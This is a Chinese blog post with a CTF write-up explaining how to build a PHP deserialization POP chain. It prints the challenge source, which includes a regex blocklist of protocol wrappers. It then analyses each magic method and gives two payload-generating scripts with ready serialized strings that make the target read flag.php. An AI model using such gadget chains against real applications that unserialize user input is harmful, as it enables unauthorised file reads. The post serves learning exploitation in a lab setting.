Web - pop链构造

最新推荐文章于 2024-04-09 20:37:07 发布
最新推荐文章于 2024-04-09 20:37:07 发布
阅读量495 收藏 3
点赞数 1
分类专栏: ctf Writeup 文章标签: 前端 php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/suichi314/article/details/121788478
版权

文章目录

源码

<?php
// flag in flag.php
class C1e4r{
    public $test;
    public $str;
    public function __construct($name){
        $this->str = $name;
    }
    public function __destruct(){
        $this->test = $this->str;
        echo $this->test;
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file){
        $this->source = $file;
        echo $this->source;
    }
    public function __toString(){
        $content = $this->str['str']->source;
        return $content;
    }
    public function __set($key,$value){
        $this->$key = $value;
    }
    public function _show(){
        if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)){
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
    }
    public function __wakeup(){
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)){
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $file;
    public $params;
    public function __construct(){
        $this->params = array();
    }

    public function __get($key){
        return $this->get($key);
    }

    public function get($key){
        if(isset($this->params[$key])){
            $value = $this->params[$key];
        } else {
            $value = "index.php";
        }
        return $this->file_get($value);
    }

    public function file_get($value){
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}


show_source(__FILE__);
$name=unserialize($_GET['strs']);
?>

分析

class C1e4r{
    public $test;
    public $str;
    public function __construct($name){
        $this->str = $name;
    }
    public function __destruct(){
        $this->test = $this->str;
        echo $this->test;
    }
}
  • 两个共有属性$teststr
  • __construct()在对象被实体化时触发,将传入的值赋给$str
  • __destruct()在对象被销毁时触发,将内部的$str赋给$test并以字符串的形式输出(可触发__toString())
class Show{
    public $source;
    public $str;
    public function __construct($file){
        $this->source = $file;
        echo $this->source;
    }
    public function __toString(){
        $content = $this->str['str']->source;
        return $content;
    }
    public function __set($key,$value){
        $this->$key = $value;
    }
    public function _show(){
        if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)){
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
    }
    public function __wakeup(){
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)){
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
  • 两个共有属性$source$str
  • __construct()在对象被实体化时触发,将传入的值赋给$source并以字符串的形式输出(触发__toString())
  • __toString()在对象被当作字符串调用时触发,返回$str['str']对象的$source(这里的$str是一个数组,他的str键对应了一个对像)
  • __set()在赋值不可访问或不存在的属性时触发,将传过来的第二个值赋给第一个值
  • _show()过滤$source,不能存在httphttpsfile:gopherdict..f1ag不区分大小写,若不存在则高亮$source
  • __wakeup()在反序列化时触发,过滤$source中的httphttpsfile:gopherdict..f1ag,并赋值$source='index.php'
class Test{
    public $file;
    public $params;
    public function __construct(){
        $this->params = array();
    }

    public function __get($key){
        return $this->get($key);
    }

    public function get($key){
        if(isset($this->params[$key])){
            $value = $this->params[$key];
        } else {
            $value = "index.php";
        }
        return $this->file_get($value);
    }

    public function file_get($value){
        $text = base64_encode(file_get_contents($value));
        return $text;
    }
}
  • 两个共有属性$file$params
  • __construct()在对象实体化时触发,将一个空数组赋给$params
  • __get()在读取不可访问得属性时触发,将传入的值传入get()函数
  • get()如果params[$key]存在,将它传入file_get(),否则将"index.php"传入file_get.php
  • file_get()得到传入的文件加密后返回
$name=unserialize($_GET['strs']);
  1. 拿flag:在Test::file_get()中有读取文件操作,Test::get()可以调用他,Teat::__get()调用get()
  2. 触发__get()Show::__toString()方法中的$str['str']->source,如果这个键对应的是Test对象,即可触发
  3. 触发__toString()C1e4r::__destruct()Show::__construct()可以触发,若为第一种,则$str=new Show;若为第二种,则$source=new Show

payload*2

  1. 使用C1e4r::__destruct()
<?php
class Test {
    public $file;
    public $params = array('source'=>'flag.php');
}
class Show {
    public $source;
    public $str;    //$str['str']=new Test
}
class C1e4r {
    public $test;
    public $str;    //$str=new Show
}
$a = new C1e4r;
$a->str = new Show;
$a->str->str['str'] = new Test;
echo serialize($a);
# O:5:"C1e4r":2:{s:4:"test";N;s:3:"str";O:4:"Show":2:{s:6:"source";N;s:3:"str";a:1:{s:3:"str";O:4:"Test":2:{s:4:"file";N;s:6:"params";a:1:{s:6:"source";s:8:"flag.php";}}}}}
  1. 使用Show::__construct()
    这里要注意一点:这个方法需要使用Show::source属性,所以需要绕过__wakeup(),最后手动将他对应的属性值改大实现绕过
<?php
class Test {
    public $file;
    public $params = array('source'=>'flag.php');
}
class Show {
    public $source;     //new Show
    public $str;        //$str['str']=new Test
}
$a = new Show;
$a->source = new Show;
$a->source->str['str'] = new Test;
echo serialize($a);
# O:4:"Show":2:{s:6:"source";O:4:"Show":2:{s:6:"source";N;s:3:"str";a:1:{s:3:"str";O:4:"Test":2:{s:4:"file";N;s:6:"params";a:1:{s:6:"source";s:8:"flag.php";}}}}s:3:"str";N;}
1ta-chi
关注
专栏目录
21-5 PHP反序列化漏洞-POP构造
weixin_43263566的博客
01-20 481
举例来说,假设有以下调用关系:A --> B,B --> C,A --> B --> C。在读代码时,会遇到很多干扰函数或代码,这些函数或代码没有任何作用,只会干扰我们的阅读。总之,要想有效地读懂代码,需要对编程语言的语法和常见函数有一定的了解,同时要有耐心和细心,逐行分析代码,找出关键点。方法中使用了正则表达式检查,我们需要构造一个恶意的序列化对象,以绕过正则表达式的检测。首先,根据代码中的逻辑,我们需要构造一个经过序列化的有效对象,并将其作为。: 这是一个构造函数的魔术方法,在创建类的实例时自动调用。
ping-[pop]-[本地复现]
qwsn
11-22 1610
0x01、Web类 1.ping-[pop]-[本地复现] 第一步:代码审计 <?php class getip{ //类:getip public $ip; //公有属性:$ip function __construct() //构造方法__construct():在实例化当前类前,自动被调用,用来给属性初始化 { $this->ip = "127.0.0.1"; //属性初始化 } function __destruct() //魔术
[WEB]pop
qq_61109509的博客
04-17 625
文章目录魔法方法小技巧分析 学长给的一道题 魔法方法 __wakeup() //执行unserialize()时,先会调用这个函数 __sleep() //执行serialize()时,先会调用这个函数,session反序列化同样会调用 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法 __set
Web POP
Light_shoot的博客
10-22 202
1>PHP序列化是将变量转换为可保存或传输的字符串的过程;反序列化就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。PHP反序列化是一种将序列化数据转换为可用的PHP数据结构的过程。PHP反序列化可以帮助PHP开发人员轻松地存储和传输复杂的和多维度的结构。PHP反序列化可以把一些PHP格式的数据,比如:数组,对象,布尔值,等,反序列化为字符串或字节流,并将这些反序列化信息存储在文件中,或者在网络间传输。
PHP反序列化入门之寻找POP(一)
weixin_44304686的博客
06-12 1380
原文接:https://mochazz.github.io/2019/02/06/PHP反序列化入门之寻找POP(一)/ 本文以 code-breaking 中 lumenserial 为例,练习PHP反序列化 POP 的寻找,题目地址:https://code-breaking.com/puzzle/7/ 。 环境搭建 运行环境要求 PHP >= 7.1.3 OpenSSL PHP...
pop构造和phar://协议
qq_48511129的博客
12-13 752
phar类似java中的jar包,是一种压缩包。可以对php项目进行打包成 .phar类型的文件,也可以把某个功能模块打包直接发布。 1.配置 要想使用phar文件,必须将phar.readonly配置项配置为0或Off <?php class B{ public function __destruct(){ echo $this -> name; } } $phar = new Phar("test.phar"); $phar -> startBuff
web——php反序列化,pop构造
最新发布
2303_79592445的博客
04-09 1396
l当我想触发__tostring时,我们得使用上面的source,让source变成一个对象,这样——tostring()刚好能触发,所以我们这么构造
codeup-web-exercises
03-30
在"codeup-web-exercises"中,我们将会遇到各种JavaScript的基础和进阶问题,涵盖变量、数据类型、控制结构、函数、对象、数组、闭包、原型等核心概念。 1. **基础概念**:首先,你需要掌握JavaScript的基本语法...
Web-Programming-Exercises
04-04
学习如何使用`count`计算数组元素数量,`foreach`遍历数组,`array_push`和`array_pop`添加或移除数组元素,以及`array_merge`合并数组等。 4. **文件与目录操作**: PHP可以用来读取、写入、创建和删除文件及目录。...
Codeup-web-exercises:Codeup文件夹
03-10
3. **对象和原型**:对象创建、属性访问、原型对象、继承机制、构造函数。 4. **数组方法**:push、pop、shift、unshift、splice、slice、concat、map、filter、reduce等。 5. **DOM操作**:选择元素...
[MRCTF2020]Ezpop --对pop构造的简单理解
StevenOnesir的博客
12-31 3217
  简单的序列化攻击是因为对魔术方法的自动调用而触发漏洞,但如果关键代码不在魔术方法,而是在一个类的普通方法中,则需要观察联系类与函数之间的关系,将其与魔术方法的利用结合起来,这时候就可以利用pop构造与攻击。 首先题目界面直接给出了源码: Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%
一道php反序列化题的pop构造
内心不种满鲜花就会长满杂草
05-19 1147
题目代码如下,其中像套娃一样,多次对魔术方法进行调用,挺烧脑。根据题目,显然目标是echo $flag。最后提交反序列化字符串,获取flag。最后我们用代码实现pop构造。然后访问,输出反序列化字符串。需要把var改为私有属性。倒退分析后,接着正推。
第五届强网杯全国网络安全挑战赛writeup
渗透测试研究中心
12-23 9813
Web1.[强网先锋]寻宝下发赛题,访问接如下:该题需要你通过信息 1 和信息 2 分别获取两段 Key 值,输入 Key1 和 Key2 然后解密。Key1之代码审计点击“信息1”,发现是代码审计:完整源码如下:<?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);highlight_file(__...
PHP反序列化
aetlypdlg_ys的博客
05-28 544
序列化是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。简而言之,序列化相当于加密,反序列化相当于解密。再看一个生动的例子:我们在网上买桌子,桌子这种很不规则的东西,这时候一般都会把它拆掉成板子,再运出去,这个过程就可看作序列化的过程(把数据转化为可以存储或者传输的形式)。当我们收到货后,需要自己把这些板子组装成桌子的样子,这个过程就像反序列的过程(转化成当初的数据对象)。php 将数据序列化和反序列化会用到两个函数serialize 将对象格式化成有序的字符串。
phar反序列化学习SWPUCTF2018 SimplePHP
qq_61142406的博客
05-26 235
https://xz.aliyun.com/t/3692#toc-13 <?php class C1e4r { public $test; public $str; public function __construct($name) { $this->str = $name; } public function __destruct() { $this->test = $this->str;
BUUCTF [SWPUCTF 2018]SimplePHP 1
weixin_45642610的博客
07-28 637
[SWPUCTF 2018]SimplePHP 1 这里主要记录下pop生成的过程,其他解题过程看其他博客。 源class.php文件: <?php #class class C1e4r { public $test; public $str; public function __construct($name) { $this->str = $name; } public function __destruct() {
[SWPUCTF 2018]SimplePHP
qq_43756333的博客
07-05 2199
平台:buuoj.cn 打开靶机有上传和查看文件功能 观察到查看文件url 可以直接读取文件内容 将各个文件源码复制下来主要有以下文件 考点:phar文件上传 先来看class.php,有三个类 C1e4r类对象创建时$name传递给$str,对象销毁时$str->$test并输出$test class C1e4r { public $test; public $str; public function __construct($name) {
phar反序列化原理及利用
永远都没有了
02-21 1566
phar协议的利用,及漏洞的产生
flag in flag.php,hgame2019解题记录
weixin_42531128的博客
03-17 1054
“想与你赏流河山川,踏青山风光无限,樵采打渔为生,尽是梦里的人间。”菜鸡来写wp啦…Level - Week 1WEB谁吃了我的flagfirst根据题目描述,vim、未正常关机…估计也就是考察vimbak的知识,意外退出时,并不会覆盖旧的交换文件,而是会重新生成新的交换文件。而原来的文件中并不会有这次的修改,文件内容还是和打开时一样。第一次产生的交换文件名为“.file.txt.swp”;再次意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1ta-chi

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值